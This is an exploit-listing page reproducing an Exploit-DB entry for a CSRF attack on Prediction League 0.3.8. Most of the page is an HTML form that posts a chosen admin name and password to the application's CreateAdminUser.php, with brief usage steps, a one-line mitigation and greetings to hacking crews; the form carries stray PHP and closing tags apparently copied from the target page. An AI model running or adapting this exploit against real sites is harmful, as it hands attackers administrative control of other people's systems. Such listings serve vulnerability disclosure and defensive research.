header-logo
Suggest Exploit
vendor:
Prediction League
by:
indoushka
3,5
CVSS
MEDIUM
CSRF Create Admin User Exploit
352
CWE
Product Name: Prediction League
Affected Version From: Prediction League 0.3.8
Affected Version To: Prediction League 0.3.8
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
Unknown

Prediction League 0.3.8 CSRF Create Admin User Exploit

This exploit allows an attacker to create an admin user on the Prediction League 0.3.8 application by crafting a malicious form and sending it to the CreateAdminUser.php page. The form contains fields for the admin user name and password, which are then used to create the admin user.

Mitigation:

Implement proper input validation and authentication mechanisms to prevent CSRF attacks.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Prediction League 0.3.8 CSRF Create Admin User Exploit            
| # Author   : indoushka                                                                                                              
| # Home     : www.iqs3cur1ty.com/vb                                                                                                                                                                                                             
| # Tested on: Lunix Français v.(9.4 Ubuntu)       
| # Bug      : CSRF Create Admin User Exploit                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
  <form method="POST" action="http://127.0.0.1/PredictionLeague/CreateAdminUser.php">
    <table>
      <tr>
        <td class="TBLHEAD" colspan="3" align="CENTER">
          <font class="TBLHEAD">
            Admin User Administration
          </font>
        </td>
      </tr>
      <tr>
        <td class="TBLROW">
          <font class="TBLROW">
            Admin User Name
          </font>
        </td>
        <td class="TBLROW">
          <font class="TBLROW">
            <input type="TEXT" size="20" name="USER" value="">
          </font>
        </td>
        <td class="TBLROW">
          <font class="TBLROW">
            The name for the admin user.
          </font>
        </td>
      </tr> 
      <tr>
        <td class="TBLROW">
          <font class="TBLROW">
            Password
          </font>
        </td>
        <td class="TBLROW">
          <font class="TBLROW">
            <input type="TEXT" size="20" name="PASSWORD">
          </font>
        </td>
        <td class="TBLROW">
          <font class="TBLROW">
            The password for the admin user.
          </font>
        </td>
      </tr> 
      <tr>
        <td colspan="3" class="TBLROW" align="CENTER">
          <input type="SUBMIT" NAME="CREATE" VALUE="CREATE">
        </td>
      </tr>
    </table>
  </form>
<?php
  }
?>

  </body>
</html>

                  
2 - Save As .html

3 - Login                 
 
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.m-y.cc * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
--------------------------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR